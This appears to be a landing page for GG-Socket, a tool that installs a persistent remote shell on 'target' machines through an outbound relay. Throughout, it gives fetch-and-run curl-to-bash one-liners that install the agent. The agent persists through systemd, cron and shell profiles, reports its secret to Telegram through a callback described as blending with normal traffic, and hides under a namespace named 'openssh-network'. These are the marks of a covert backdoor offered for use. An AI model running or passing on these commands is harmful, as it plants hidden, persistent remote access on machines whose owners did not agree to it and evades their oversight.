What is gsocket, and how is GG-Socket related to it?

gsocket connects two machines through a shared secret key over a relay, so neither needs a public IP. GG-Socket is a self-hosted gsocket relay running on your own VPS.

Does the target machine need any inbound ports open?

No. The agent connects outbound to the relay on port 443. No inbound rules, no port forwarding, no static IP.

Secret shell on any machine.

GG-Socket is a self-hosted gsocket relay. Run one command on a box behind NAT or a firewall — it dials out over :443. Connect from anywhere with the secret it prints. No public IP, no port forwarding, no VPN.

$ install how it works →

root@target — bash

$ ▋

cat about

Two machines, one shared secret. Both connect outbound to a relay you control; the relay matches them by secret and splices their streams into a tunnel. It's the gsocket mechanism — except the relay runs on your VPS, so the traffic never touches a third party. gsocket-protocol compatible: any gsocket-style client works against it.

run how.sh

three steps to a shell

install on the target — bash -c "$(curl -fsSL https://ggsocket.com/y)". Generates a secret, persists across reboots, starts.
note the secret — a GGK-… key is printed (and sent to your Telegram).
connect from anywhere — S=GGK-… bash -c "$(curl -fsSL https://ggsocket.com/y)". Live shell.

ls features/

what it does

zero network config — no inbound ports, no static IP, no VPN; both sides dial out over TLS :443
tls + session password — relay TLS by default, plus an application-layer password after the match
persistent — systemd + cron + profile layers; same secret on every reboot, auto-reconnect
full interactive pty — colors, tab-complete, vim, htop; Ctrl+] to disconnect
quiet notifications — first-run callback → Telegram, asynchronously, blends with normal traffic
self-hosted & open source — pure-Go relay, Docker Compose; your traffic stays on your gear
coexists — distinct openssh-network namespace; runs alongside gsocket and hgsocket

./install --help

install · connect · remove

# install on a target — generates secret, persists, starts
bash -c "$(curl -fsSL https://ggsocket.com/y)"

# Cloudflare blocking the target's IP? Use the direct fallback:
bash -c "$(curl -fsSL https://dl.ggsocket.com/y)"

# connect from anywhere with the secret
S=GGK-… bash -c "$(curl -fsSL https://ggsocket.com/y)"

# uninstall (removes all persistence + the binary)
GS_UNDO=1 bash -c "$(curl -fsSL https://ggsocket.com/y)"

cat flags

X=<secret>use this secret at install instead of auto-generating

GS_NOINST=1one-shot — run once, no persistence

GS_HOST / GS_PORTpoint the agent at your own relay

GS_TLS=offdisable TLS (not recommended)

GS_EXEC=<cmd>run a custom command instead of a shell

cat faq.txt

questions

what is gsocket, and how is GG-Socket related?

gsocket connects two machines through a shared secret over a relay, so neither needs a public IP or forwarded port. GG-Socket is a self-hosted gsocket relay — same protocol, your own VPS.

does the target need inbound ports open?

No. The agent connects outbound to the relay on :443. No inbound rules, no port forwarding, no static IP on either end.

is it encrypted?

Yes — relay TLS by default, plus a session password (generated at install) required after the match.

what if the target reboots?

Persistence across systemd, cron @reboot, and shell profile. Same secret and password on every reconnect — nothing to reconfigure.

can i self-host the relay?

Yes — that's the point. It's a pure-Go Docker Compose stack on your own VPS; the agent then dials your domain on :443.

does it conflict with gsocket / hgsocket?

No. GG-Socket uses its own openssh-network namespace, so it coexists with gsocket and hgsocket on the same target.

cat self-host.md

run your own relay

The relay is a pure-Go binary you deploy with Docker Compose on a VPS, fronting :443. The agent then dials your domain. See the deploy guide — or point an installed agent at your relay with GS_HOST/GS_PORT.